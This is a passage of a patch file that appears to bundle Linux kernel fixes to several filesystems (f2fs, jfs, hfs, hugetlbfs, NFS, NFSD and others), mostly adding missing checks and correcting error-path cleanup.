+ 	if (!test_opt(sbi, DISABLE_EXT_IDENTIFY))
+ 		set_file_temperature(sbi, inode, dentry->d_name.name);
+ 
+-	set_compress_inode(sbi, inode, dentry->d_name.name);
+-
+ 	inode->i_op = &f2fs_file_inode_operations;
+ 	inode->i_fop = &f2fs_file_operations;
+ 	inode->i_mapping->a_ops = &f2fs_dblock_aops;
+@@ -689,7 +686,7 @@ static int f2fs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, S_IFLNK | S_IRWXUGO);
++	inode = f2fs_new_inode(mnt_userns, dir, S_IFLNK | S_IRWXUGO, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+@@ -760,7 +757,7 @@ static int f2fs_mkdir(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, S_IFDIR | mode);
++	inode = f2fs_new_inode(mnt_userns, dir, S_IFDIR | mode, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+@@ -817,7 +814,7 @@ static int f2fs_mknod(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, mode);
++	inode = f2fs_new_inode(mnt_userns, dir, mode, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+@@ -856,7 +853,7 @@ static int __f2fs_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, mode);
++	inode = f2fs_new_inode(mnt_userns, dir, mode, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index acf3d3fa43635..c1d0713666ee5 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -1170,7 +1170,7 @@ submit:
+ 
+ 		atomic_inc(&dcc->issued_discard);
+ 
+-		f2fs_update_iostat(sbi, NULL, FS_DISCARD, 1);
++		f2fs_update_iostat(sbi, NULL, FS_DISCARD, len * F2FS_BLKSIZE);
+ 
+ 		lstart += len;
+ 		start += len;
+@@ -1448,7 +1448,7 @@ retry:
+ 		if (i + 1 < dpolicy->granularity)
+ 			break;
+ 
+-		if (i < DEFAULT_DISCARD_GRANULARITY && dpolicy->ordered)
++		if (i + 1 < DEFAULT_DISCARD_GRANULARITY && dpolicy->ordered)
+ 			return __issue_discard_cmd_orderly(sbi, dpolicy);
+ 
+ 		pend_list = &dcc->pend_list[i];
+@@ -2025,8 +2025,10 @@ int f2fs_start_discard_thread(struct f2fs_sb_info *sbi)
+ 
+ 	dcc->f2fs_issue_discard = kthread_run(issue_discard_thread, sbi,
+ 				"f2fs_discard-%u:%u", MAJOR(dev), MINOR(dev));
+-	if (IS_ERR(dcc->f2fs_issue_discard))
++	if (IS_ERR(dcc->f2fs_issue_discard)) {
+ 		err = PTR_ERR(dcc->f2fs_issue_discard);
++		dcc->f2fs_issue_discard = NULL;
++	}
+ 
+ 	return err;
+ }
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 3834ead046200..67d51f5276061 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -4188,6 +4188,9 @@ try_onemore:
+ 	if (err)
+ 		goto free_bio_info;
+ 
++	spin_lock_init(&sbi->error_lock);
++	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
++
+ 	init_f2fs_rwsem(&sbi->cp_rwsem);
+ 	init_f2fs_rwsem(&sbi->quota_sem);
+ 	init_waitqueue_head(&sbi->cp_wait);
+@@ -4255,9 +4258,6 @@ try_onemore:
+ 		goto free_devices;
+ 	}
+ 
+-	spin_lock_init(&sbi->error_lock);
+-	memcpy(sbi->errors, raw_super->s_errors, MAX_F2FS_ERRORS);
+-
+ 	sbi->total_valid_node_count =
+ 				le32_to_cpu(sbi->ckpt->valid_node_count);
+ 	percpu_counter_set(&sbi->total_valid_inode_count,
+@@ -4523,9 +4523,9 @@ free_nm:
+ 	f2fs_destroy_node_manager(sbi);
+ free_sm:
+ 	f2fs_destroy_segment_manager(sbi);
+-	f2fs_destroy_post_read_wq(sbi);
+ stop_ckpt_thread:
+ 	f2fs_stop_ckpt_thread(sbi);
++	f2fs_destroy_post_read_wq(sbi);
+ free_devices:
+ 	destroy_device_list(sbi);
+ 	kvfree(sbi->ckpt);
+diff --git a/fs/gfs2/glock.c b/fs/gfs2/glock.c
+index df335c258eb08..235a0948f6cc6 100644
+--- a/fs/gfs2/glock.c
++++ b/fs/gfs2/glock.c
+@@ -1039,6 +1039,7 @@ static void delete_work_func(struct work_struct *work)
+ 			if (gfs2_queue_delete_work(gl, 5 * HZ))
+ 				return;
+ 		}
++		goto out;
+ 	}
+ 
+ 	inode = gfs2_lookup_by_inum(sdp, no_addr, gl->gl_no_formal_ino,
+@@ -1051,6 +1052,7 @@ static void delete_work_func(struct work_struct *work)
+ 		d_prune_aliases(inode);
+ 		iput(inode);
+ 	}
++out:
+ 	gfs2_glock_put(gl);
+ }
+ 
+diff --git a/fs/hfs/inode.c b/fs/hfs/inode.c
+index c4526f16355d5..a0746be3c1de7 100644
+--- a/fs/hfs/inode.c
++++ b/fs/hfs/inode.c
+@@ -458,6 +458,8 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		/* panic? */
+ 		return -EIO;
+ 
++	if (HFS_I(main_inode)->cat_key.CName.len > HFS_NAMELEN)
++		return -EIO;
+ 	fd.search_key->cat = HFS_I(main_inode)->cat_key;
+ 	if (hfs_brec_find(&fd))
+ 		/* panic? */
+diff --git a/fs/hfs/trans.c b/fs/hfs/trans.c
+index 39f5e343bf4d4..fdb0edb8a607d 100644
+--- a/fs/hfs/trans.c
++++ b/fs/hfs/trans.c
+@@ -109,7 +109,7 @@ void hfs_asc2mac(struct super_block *sb, struct hfs_name *out, const struct qstr
+ 	if (nls_io) {
+ 		wchar_t ch;
+ 
+-		while (srclen > 0) {
++		while (srclen > 0 && dstlen > 0) {
+ 			size = nls_io->char2uni(src, srclen, &ch);
+ 			if (size < 0) {
+ 				ch = '?';
+diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
+index df7772335dc0e..8eea709e36599 100644
+--- a/fs/hugetlbfs/inode.c
++++ b/fs/hugetlbfs/inode.c
+@@ -1377,7 +1377,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_size:
+ 		/* memparse() will accept a K/M/G without a digit */
+-		if (!isdigit(param->string[0]))
++		if (!param->string || !isdigit(param->string[0]))
+ 			goto bad_val;
+ 		ctx->max_size_opt = memparse(param->string, &rest);
+ 		ctx->max_val_type = SIZE_STD;
+@@ -1387,7 +1387,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_nr_inodes:
+ 		/* memparse() will accept a K/M/G without a digit */
+-		if (!isdigit(param->string[0]))
++		if (!param->string || !isdigit(param->string[0]))
+ 			goto bad_val;
+ 		ctx->nr_inodes = memparse(param->string, &rest);
+ 		return 0;
+@@ -1403,7 +1403,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_min_size:
+ 		/* memparse() will accept a K/M/G without a digit */
+-		if (!isdigit(param->string[0]))
++		if (!param->string || !isdigit(param->string[0]))
+ 			goto bad_val;
+ 		ctx->min_size_opt = memparse(param->string, &rest);
+ 		ctx->min_val_type = SIZE_STD;
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 6b838d3ae7c2e..765838578a722 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -155,7 +155,7 @@ int dbMount(struct inode *ipbmap)
+ 	struct bmap *bmp;
+ 	struct dbmap_disk *dbmp_le;
+ 	struct metapage *mp;
+-	int i;
++	int i, err;
+ 
+ 	/*
+ 	 * allocate/initialize the in-memory bmap descriptor
+@@ -170,8 +170,8 @@ int dbMount(struct inode *ipbmap)
+ 			   BMAPBLKNO << JFS_SBI(ipbmap->i_sb)->l2nbperpage,
+ 			   PSIZE, 0);
+ 	if (mp == NULL) {
+-		kfree(bmp);
+-		return -EIO;
++		err = -EIO;
++		goto err_kfree_bmp;
+ 	}
+ 
+ 	/* copy the on-disk bmap descriptor to its in-memory version. */
+@@ -181,9 +181,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_l2nbperpage = le32_to_cpu(dbmp_le->dn_l2nbperpage);
+ 	bmp->db_numag = le32_to_cpu(dbmp_le->dn_numag);
+ 	if (!bmp->db_numag) {
+-		release_metapage(mp);
+-		kfree(bmp);
+-		return -EINVAL;
++		err = -EINVAL;
++		goto err_release_metapage;
+ 	}
+ 
+ 	bmp->db_maxlevel = le32_to_cpu(dbmp_le->dn_maxlevel);
+@@ -194,6 +193,16 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+ 	bmp->db_agstart = le32_to_cpu(dbmp_le->dn_agstart);
+ 	bmp->db_agl2size = le32_to_cpu(dbmp_le->dn_agl2size);
++	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
++	if (((bmp->db_mapsize - 1) >> bmp->db_agl2size) > MAXAG) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
+ 	for (i = 0; i < MAXAG; i++)
+ 		bmp->db_agfree[i] = le64_to_cpu(dbmp_le->dn_agfree[i]);
+ 	bmp->db_agsize = le64_to_cpu(dbmp_le->dn_agsize);
+@@ -214,6 +223,12 @@ int dbMount(struct inode *ipbmap)
+ 	BMAP_LOCK_INIT(bmp);
+ 
+ 	return (0);
++
++err_release_metapage:
++	release_metapage(mp);
++err_kfree_bmp:
++	kfree(bmp);
++	return err;
+ }
+ 
+ 
+diff --git a/fs/jfs/namei.c b/fs/jfs/namei.c
+index 9db4f5789c0ec..4fbbf88435e69 100644
+--- a/fs/jfs/namei.c
++++ b/fs/jfs/namei.c
+@@ -946,7 +946,7 @@ static int jfs_symlink(struct user_namespace *mnt_userns, struct inode *dip,
+ 	if (ssize <= IDATASIZE) {
+ 		ip->i_op = &jfs_fast_symlink_inode_operations;
+ 
+-		ip->i_link = JFS_IP(ip)->i_inline;
++		ip->i_link = JFS_IP(ip)->i_inline_all;
+ 		memcpy(ip->i_link, name, ssize);
+ 		ip->i_size = ssize - 1;
+ 
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+index 3fa2139a0b309..92b1603b5abeb 100644
+--- a/fs/ksmbd/mgmt/user_session.c
++++ b/fs/ksmbd/mgmt/user_session.c
+@@ -108,15 +108,17 @@ int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+ 	entry->method = method;
+ 	entry->id = ksmbd_ipc_id_alloc();
+ 	if (entry->id < 0)
+-		goto error;
++		goto free_entry;
+ 
+ 	resp = ksmbd_rpc_open(sess, entry->id);
+ 	if (!resp)
+-		goto error;
++		goto free_id;
+ 
+ 	kvfree(resp);
+ 	return entry->id;
+-error:
++free_id:
++	ksmbd_rpc_id_free(entry->id);
++free_entry:
+ 	list_del(&entry->list);
+ 	kfree(entry);
+ 	return -EINVAL;
+diff --git a/fs/libfs.c b/fs/libfs.c
+index 682d56345a1cf..aada4e7c87132 100644
+--- a/fs/libfs.c
++++ b/fs/libfs.c
+@@ -995,8 +995,8 @@ out:
+ EXPORT_SYMBOL_GPL(simple_attr_read);
+ 
+ /* interpret the buffer as a number to call the set function with */
+-ssize_t simple_attr_write(struct file *file, const char __user *buf,
+-			  size_t len, loff_t *ppos)
++static ssize_t simple_attr_write_xsigned(struct file *file, const char __user *buf,
++			  size_t len, loff_t *ppos, bool is_signed)
+ {
+ 	struct simple_attr *attr;
+ 	unsigned long long val;
+@@ -1017,7 +1017,10 @@ ssize_t simple_attr_write(struct file *file, const char __user *buf,
+ 		goto out;
+ 
+ 	attr->set_buf[size] = '\0';
+-	ret = kstrtoull(attr->set_buf, 0, &val);
++	if (is_signed)
++		ret = kstrtoll(attr->set_buf, 0, &val);
++	else
++		ret = kstrtoull(attr->set_buf, 0, &val);
+ 	if (ret)
+ 		goto out;
+ 	ret = attr->set(attr->data, val);
+@@ -1027,8 +1030,21 @@ out:
+ 	mutex_unlock(&attr->mutex);
+ 	return ret;
+ }
++
++ssize_t simple_attr_write(struct file *file, const char __user *buf,
++			  size_t len, loff_t *ppos)
++{
++	return simple_attr_write_xsigned(file, buf, len, ppos, false);
++}
+ EXPORT_SYMBOL_GPL(simple_attr_write);
+ 
++ssize_t simple_attr_write_signed(struct file *file, const char __user *buf,
++			  size_t len, loff_t *ppos)
++{
++	return simple_attr_write_xsigned(file, buf, len, ppos, true);
++}
++EXPORT_SYMBOL_GPL(simple_attr_write_signed);
++
+ /**
+  * generic_fh_to_dentry - generic helper for the fh_to_dentry export operation
+  * @sb:		filesystem to do the file handle conversion on
+diff --git a/fs/lockd/svcsubs.c b/fs/lockd/svcsubs.c
+index e1c4617de7714..3515f17eaf3fb 100644
+--- a/fs/lockd/svcsubs.c
++++ b/fs/lockd/svcsubs.c
+@@ -176,7 +176,7 @@ nlm_delete_file(struct nlm_file *file)
+ 	}
+ }
+ 
+-static int nlm_unlock_files(struct nlm_file *file, fl_owner_t owner)
++static int nlm_unlock_files(struct nlm_file *file, const struct file_lock *fl)
+ {
+ 	struct file_lock lock;
+ 
+@@ -184,12 +184,15 @@ static int nlm_unlock_files(struct nlm_file *file, fl_owner_t owner)
+ 	lock.fl_type  = F_UNLCK;
+ 	lock.fl_start = 0;
+ 	lock.fl_end   = OFFSET_MAX;
+-	lock.fl_owner = owner;
+-	if (file->f_file[O_RDONLY] &&
+-	    vfs_lock_file(file->f_file[O_RDONLY], F_SETLK, &lock, NULL))
++	lock.fl_owner = fl->fl_owner;
++	lock.fl_pid   = fl->fl_pid;
++	lock.fl_flags = FL_POSIX;
++
++	lock.fl_file = file->f_file[O_RDONLY];
++	if (lock.fl_file && vfs_lock_file(lock.fl_file, F_SETLK, &lock, NULL))
+ 		goto out_err;
+-	if (file->f_file[O_WRONLY] &&
+-	    vfs_lock_file(file->f_file[O_WRONLY], F_SETLK, &lock, NULL))
++	lock.fl_file = file->f_file[O_WRONLY];
++	if (lock.fl_file && vfs_lock_file(lock.fl_file, F_SETLK, &lock, NULL))
+ 		goto out_err;
+ 	return 0;
+ out_err:
+@@ -226,7 +229,7 @@ again:
+ 		if (match(lockhost, host)) {
+ 
+ 			spin_unlock(&flctx->flc_lock);
+-			if (nlm_unlock_files(file, fl->fl_owner))
++			if (nlm_unlock_files(file, fl))
+ 				return 1;
+ 			goto again;
+ 		}
+diff --git a/fs/nfs/fs_context.c b/fs/nfs/fs_context.c
+index 09833ec102fca..9bcd53d5c7d46 100644
+--- a/fs/nfs/fs_context.c
++++ b/fs/nfs/fs_context.c
+@@ -684,6 +684,8 @@ static int nfs_fs_context_parse_param(struct fs_context *fc,
+ 			return ret;
+ 		break;
+ 	case Opt_vers:
++		if (!param->string)
++			goto out_invalid_value;
+ 		trace_nfs_mount_assign(param->key, param->string);
+ 		ret = nfs_parse_version_string(fc, param->string);
+ 		if (ret < 0)
+@@ -696,6 +698,8 @@ static int nfs_fs_context_parse_param(struct fs_context *fc,
+ 		break;
+ 
+ 	case Opt_proto:
++		if (!param->string)
++			goto out_invalid_value;
+ 		trace_nfs_mount_assign(param->key, param->string);
+ 		protofamily = AF_INET;
+ 		switch (lookup_constant(nfs_xprt_protocol_tokens, param->string, -1)) {
+@@ -732,6 +736,8 @@ static int nfs_fs_context_parse_param(struct fs_context *fc,
+ 		break;
+ 
+ 	case Opt_mountproto:
++		if (!param->string)
++			goto out_invalid_value;
+ 		trace_nfs_mount_assign(param->key, param->string);
+ 		mountfamily = AF_INET;
+ 		switch (lookup_constant(nfs_xprt_protocol_tokens, param->string, -1)) {
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index 647fc3f547cbe..ae7d4a8c728c2 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -739,12 +739,10 @@ unsigned long nfs_io_size(unsigned long iosize, enum xprt_transports proto)
+ 		iosize = NFS_DEF_FILE_IO_SIZE;
+ 	else if (iosize >= NFS_MAX_FILE_IO_SIZE)
+ 		iosize = NFS_MAX_FILE_IO_SIZE;
+-	else
+-		iosize = iosize & PAGE_MASK;
+ 
+-	if (proto == XPRT_TRANSPORT_UDP)
++	if (proto == XPRT_TRANSPORT_UDP || iosize < PAGE_SIZE)
+ 		return nfs_block_bits(iosize, NULL);
+-	return iosize;
++	return iosize & PAGE_MASK;
+ }
+ 
+ /*
+diff --git a/fs/nfs/namespace.c b/fs/nfs/namespace.c
+index 2f336ace75554..88a23af2bd5c9 100644
+--- a/fs/nfs/namespace.c
++++ b/fs/nfs/namespace.c
+@@ -147,7 +147,7 @@ struct vfsmount *nfs_d_automount(struct path *path)
+ 	struct nfs_fs_context *ctx;
+ 	struct fs_context *fc;
+ 	struct vfsmount *mnt = ERR_PTR(-ENOMEM);
+-	struct nfs_server *server = NFS_SERVER(d_inode(path->dentry));
++	struct nfs_server *server = NFS_SB(path->dentry->d_sb);
+ 	struct nfs_client *client = server->nfs_client;
+ 	int timeout = READ_ONCE(nfs_mountpoint_expiry_timeout);
+ 	int ret;
+diff --git a/fs/nfs/nfs42xdr.c b/fs/nfs/nfs42xdr.c
+index fe1aeb0f048f2..2fd465cab631d 100644
+--- a/fs/nfs/nfs42xdr.c
++++ b/fs/nfs/nfs42xdr.c
+@@ -1142,7 +1142,7 @@ static int decode_read_plus(struct xdr_stream *xdr, struct nfs_pgio_res *res)
+ 	if (!segs)
+ 		return -ENOMEM;
+ 
+-	xdr_set_scratch_buffer(xdr, &scratch_buf, 32);
++	xdr_set_scratch_buffer(xdr, &scratch_buf, sizeof(scratch_buf));
+ 	status = -EIO;
+ 	for (i = 0; i < segments; i++) {
+ 		status = decode_read_plus_segment(xdr, &segs[i]);
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 86ed5c0142c3d..e51044a5f550f 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -122,6 +122,11 @@ nfs4_label_init_security(struct inode *dir, struct dentry *dentry,
+ 	if (nfs_server_capable(dir, NFS_CAP_SECURITY_LABEL) == 0)
+ 		return NULL;
+ 
++	label->lfs = 0;
++	label->pi = 0;
++	label->len = 0;
++	label->label = NULL;
++
+ 	err = security_dentry_init_security(dentry, sattr->ia_mode,
+ 				&dentry->d_name, NULL,
+ 				(void **)&label->label, &label->len);
+@@ -2126,18 +2131,18 @@ static struct nfs4_opendata *nfs4_open_recoverdata_alloc(struct nfs_open_context
+ }
+ 
+ static int nfs4_open_recover_helper(struct nfs4_opendata *opendata,
+-		fmode_t fmode)
++				    fmode_t fmode)
+ {
+ 	struct nfs4_state *newstate;
++	struct nfs_server *server = NFS_SB(opendata->dentry->d_sb);
++	int openflags = opendata->o_arg.open_flags;
+ 	int ret;
+ 
+ 	if (!nfs4_mode_match_open_stateid(opendata->state, fmode))
+ 		return 0;
+-	opendata->o_arg.open_flags = 0;
+ 	opendata->o_arg.fmode = fmode;
+-	opendata->o_arg.share_access = nfs4_map_atomic_open_share(
+-			NFS_SB(opendata->dentry->d_sb),
+-			fmode, 0);
++	opendata->o_arg.share_access =
++		nfs4_map_atomic_open_share(server, fmode, openflags);
+ 	memset(&opendata->o_res, 0, sizeof(opendata->o_res));
+ 	memset(&opendata->c_res, 0, sizeof(opendata->c_res));
+ 	nfs4_init_opendata_res(opendata);
+@@ -2719,10 +2724,15 @@ static int _nfs4_open_expired(struct nfs_open_context *ctx, struct nfs4_state *s
+ 	struct nfs4_opendata *opendata;
+ 	int ret;
+ 
+-	opendata = nfs4_open_recoverdata_alloc(ctx, state,
+-			NFS4_OPEN_CLAIM_FH);
++	opendata = nfs4_open_recoverdata_alloc(ctx, state, NFS4_OPEN_CLAIM_FH);
+ 	if (IS_ERR(opendata))
+ 		return PTR_ERR(opendata);
++	/*
++	 * We're not recovering a delegation, so ask for no delegation.
++	 * Otherwise the recovery thread could deadlock with an outstanding
++	 * delegation return.
++	 */
++	opendata->o_arg.open_flags = O_DIRECT;
+ 	ret = nfs4_open_recover(opendata, state);
+ 	if (ret == -ESTALE)
+ 		d_drop(ctx->dentry);
+@@ -3796,7 +3806,7 @@ nfs4_atomic_open(struct inode *dir, struct nfs_open_context *ctx,
+ 		int open_flags, struct iattr *attr, int *opened)
+ {
+ 	struct nfs4_state *state;
+-	struct nfs4_label l = {0, 0, 0, NULL}, *label = NULL;
++	struct nfs4_label l, *label;
+ 
+ 	label = nfs4_label_init_security(dir, ctx->dentry, attr, &l);
+ 
+@@ -4013,7 +4023,7 @@ static int _nfs4_discover_trunking(struct nfs_server *server,
+ 
+ 	page = alloc_page(GFP_KERNEL);
+ 	if (!page)
+-		return -ENOMEM;
++		goto out_put_cred;
+ 	locations = kmalloc(sizeof(struct nfs4_fs_locations), GFP_KERNEL);
+ 	if (!locations)
+ 		goto out_free;
+@@ -4035,6 +4045,8 @@ out_free_2:
+ 	kfree(locations);
+ out_free:
+ 	__free_page(page);
++out_put_cred:
++	put_cred(cred);
+ 	return status;
+ }
+ 
+@@ -4682,7 +4694,7 @@ nfs4_proc_create(struct inode *dir, struct dentry *dentry, struct iattr *sattr,
+ 		 int flags)
+ {
+ 	struct nfs_server *server = NFS_SERVER(dir);
+-	struct nfs4_label l, *ilabel = NULL;
++	struct nfs4_label l, *ilabel;
+ 	struct nfs_open_context *ctx;
+ 	struct nfs4_state *state;
+ 	int status = 0;
+@@ -5033,7 +5045,7 @@ static int nfs4_proc_symlink(struct inode *dir, struct dentry *dentry,
+ 	struct nfs4_exception exception = {
+ 		.interruptible = true,
+ 	};
+-	struct nfs4_label l, *label = NULL;
++	struct nfs4_label l, *label;
+ 	int err;
+ 
+ 	label = nfs4_label_init_security(dir, dentry, sattr, &l);
+@@ -5074,7 +5086,7 @@ static int nfs4_proc_mkdir(struct inode *dir, struct dentry *dentry,
+ 	struct nfs4_exception exception = {
+ 		.interruptible = true,
+ 	};
+-	struct nfs4_label l, *label = NULL;
++	struct nfs4_label l, *label;
+ 	int err;
+ 
+ 	label = nfs4_label_init_security(dir, dentry, sattr, &l);
+@@ -5193,7 +5205,7 @@ static int nfs4_proc_mknod(struct inode *dir, struct dentry *dentry,
+ 	struct nfs4_exception exception = {
+ 		.interruptible = true,
+ 	};
+-	struct nfs4_label l, *label = NULL;
++	struct nfs4_label l, *label;
+ 	int err;
+ 
+ 	label = nfs4_label_init_security(dir, dentry, sattr, &l);
+diff --git a/fs/nfs/nfs4state.c b/fs/nfs/nfs4state.c
+index a2d2d5d1b0888..03087ef1c7b4a 100644
+--- a/fs/nfs/nfs4state.c
++++ b/fs/nfs/nfs4state.c
+@@ -1230,6 +1230,8 @@ void nfs4_schedule_state_manager(struct nfs_client *clp)
+ 	if (IS_ERR(task)) {
+ 		printk(KERN_ERR "%s: kthread_run: %ld\n",
+ 			__func__, PTR_ERR(task));
++		if (!nfs_client_init_is_complete(clp))
++			nfs_mark_client_ready(clp, PTR_ERR(task));
+ 		nfs4_clear_state_manager_bit(clp);
+ 		clear_bit(NFS4CLNT_MANAGER_AVAILABLE, &clp->cl_state);
+ 		nfs_put_client(clp);
+diff --git a/fs/nfs/nfs4xdr.c b/fs/nfs/nfs4xdr.c
+index acfe5f4bda480..deec76cf5afea 100644
+--- a/fs/nfs/nfs4xdr.c
++++ b/fs/nfs/nfs4xdr.c
+@@ -4234,19 +4234,17 @@ static int decode_attr_security_label(struct xdr_stream *xdr, uint32_t *bitmap,
+ 		p = xdr_inline_decode(xdr, len);
+ 		if (unlikely(!p))
+ 			return -EIO;
++		bitmap[2] &= ~FATTR4_WORD2_SECURITY_LABEL;
+ 		if (len < NFS4_MAXLABELLEN) {
+-			if (label) {
+-				if (label->len) {
+-					if (label->len < len)
+-						return -ERANGE;
+-					memcpy(label->label, p, len);
+-				}
++			if (label && label->len) {
++				if (label->len < len)
++					return -ERANGE;
++				memcpy(label->label, p, len);
+ 				label->len = len;
+ 				label->pi = pi;
+ 				label->lfs = lfs;
+ 				status = NFS_ATTR_FATTR_V4_SECURITY_LABEL;
+ 			}
+-			bitmap[2] &= ~FATTR4_WORD2_SECURITY_LABEL;
+ 		} else
+ 			printk(KERN_WARNING "%s: label too long (%u)!\n",
+ 					__func__, len);
+@@ -4755,12 +4753,10 @@ static int decode_getfattr_attrs(struct xdr_stream *xdr, uint32_t *bitmap,
+ 	if (status < 0)
+ 		goto xdr_error;
+ 
+-	if (fattr->label) {
+-		status = decode_attr_security_label(xdr, bitmap, fattr->label);
+-		if (status < 0)
+-			goto xdr_error;
+-		fattr->valid |= status;
+-	}
++	status = decode_attr_security_label(xdr, bitmap, fattr->label);
++	if (status < 0)
++		goto xdr_error;
++	fattr->valid |= status;
+ 
+ xdr_error:
+ 	dprintk("%s: xdr returned %d\n", __func__, -status);
+diff --git a/fs/nfsd/nfs2acl.c b/fs/nfsd/nfs2acl.c
+index 13e6e6897f6cf..65d4511b7af08 100644
+--- a/fs/nfsd/nfs2acl.c
++++ b/fs/nfsd/nfs2acl.c
+@@ -246,7 +246,6 @@ nfsaclsvc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ 	struct nfsd3_getaclres *resp = rqstp->rq_resp;
+ 	struct dentry *dentry = resp->fh.fh_dentry;
+ 	struct inode *inode;
+-	int w;
+ 
+ 	if (!svcxdr_encode_stat(xdr, resp->status))
+ 		return false;
+@@ -260,15 +259,6 @@ nfsaclsvc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ 	if (xdr_stream_encode_u32(xdr, resp->mask) < 0)
+ 		return false;
+ 
+-	rqstp->rq_res.page_len = w = nfsacl_size(
+-		(resp->mask & NFS_ACL)   ? resp->acl_access  : NULL,
+-		(resp->mask & NFS_DFACL) ? resp->acl_default : NULL);
+-	while (w > 0) {
+-		if (!*(rqstp->rq_next_page++))
+-			return true;
+-		w -= PAGE_SIZE;
+-	}
+-
+ 	if (!nfs_stream_encode_acl(xdr, inode, resp->acl_access,
+ 				   resp->mask & NFS_ACL, 0))
+ 		return false;
+diff --git a/fs/nfsd/nfs3acl.c b/fs/nfsd/nfs3acl.c
+index 2fb9ee3564558..a34a22e272ad5 100644
+--- a/fs/nfsd/nfs3acl.c
++++ b/fs/nfsd/nfs3acl.c
+@@ -171,11 +171,7 @@ nfs3svc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ {
+ 	struct nfsd3_getaclres *resp = rqstp->rq_resp;
+ 	struct dentry *dentry = resp->fh.fh_dentry;
+-	struct kvec *head = rqstp->rq_res.head;
+ 	struct inode *inode;
+-	unsigned int base;
+-	int n;
+-	int w;
+ 
+ 	if (!svcxdr_encode_nfsstat3(xdr, resp->status))
+ 		return false;
+@@ -187,26 +183,12 @@ nfs3svc_encode_getaclres(struct svc_rqst *rqstp, struct xdr_stream *xdr)
+ 		if (xdr_stream_encode_u32(xdr, resp->mask) < 0)
+ 			return false;
+ 
+-		base = (char *)xdr->p - (char *)head->iov_base;
+-
+-		rqstp->rq_res.page_len = w = nfsacl_size(
+-			(resp->mask & NFS_ACL)   ? resp->acl_access  : NULL,
+-			(resp->mask & NFS_DFACL) ? resp->acl_default : NULL);
+-		while (w > 0) {
+-			if (!*(rqstp->rq_next_page++))
+-				return false;
+-			w -= PAGE_SIZE;
+-		}
+-
+-		n = nfsacl_encode(&rqstp->rq_res, base, inode,
+-				  resp->acl_access,
+-				  resp->mask & NFS_ACL, 0);
+-		if (n > 0)
+-			n = nfsacl_encode(&rqstp->rq_res, base + n, inode,
+-					  resp->acl_default,
+-					  resp->mask & NFS_DFACL,
+-					  NFS_ACL_DEFAULT);
+-		if (n <= 0)
++		if (!nfs_stream_encode_acl(xdr, inode, resp->acl_access,
++					   resp->mask & NFS_ACL, 0))
++			return false;
++		if (!nfs_stream_encode_acl(xdr, inode, resp->acl_default,
++					   resp->mask & NFS_DFACL,
++					   NFS_ACL_DEFAULT))
+ 			return false;
+ 		break;
+ 	default:
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index f0e69edf5f0f1..6253cbe5f81b4 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -916,7 +916,6 @@ static int setup_callback_client(struct nfs4_client *clp, struct nfs4_cb_conn *c
+ 	} else {
+ 		if (!conn->cb_xprt)
+ 			return -EINVAL;
+-		clp->cl_cb_conn.cb_xprt = conn->cb_xprt;
+ 		clp->cl_cb_session = ses;
+ 		args.bc_xprt = conn->cb_xprt;
+ 		args.prognumber = clp->cl_cb_session->se_cb_prog;
+@@ -936,6 +935,9 @@ static int setup_callback_client(struct nfs4_client *clp, struct nfs4_cb_conn *c
+ 		rpc_shutdown_client(client);
+ 		return -ENOMEM;
+ 	}
++
++	if (clp->cl_minorversion != 0)
++		clp->cl_cb_conn.cb_xprt = conn->cb_xprt;
+ 	clp->cl_cb_client = client;
+ 	clp->cl_cb_cred = cred;
+ 	rcu_read_lock();
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
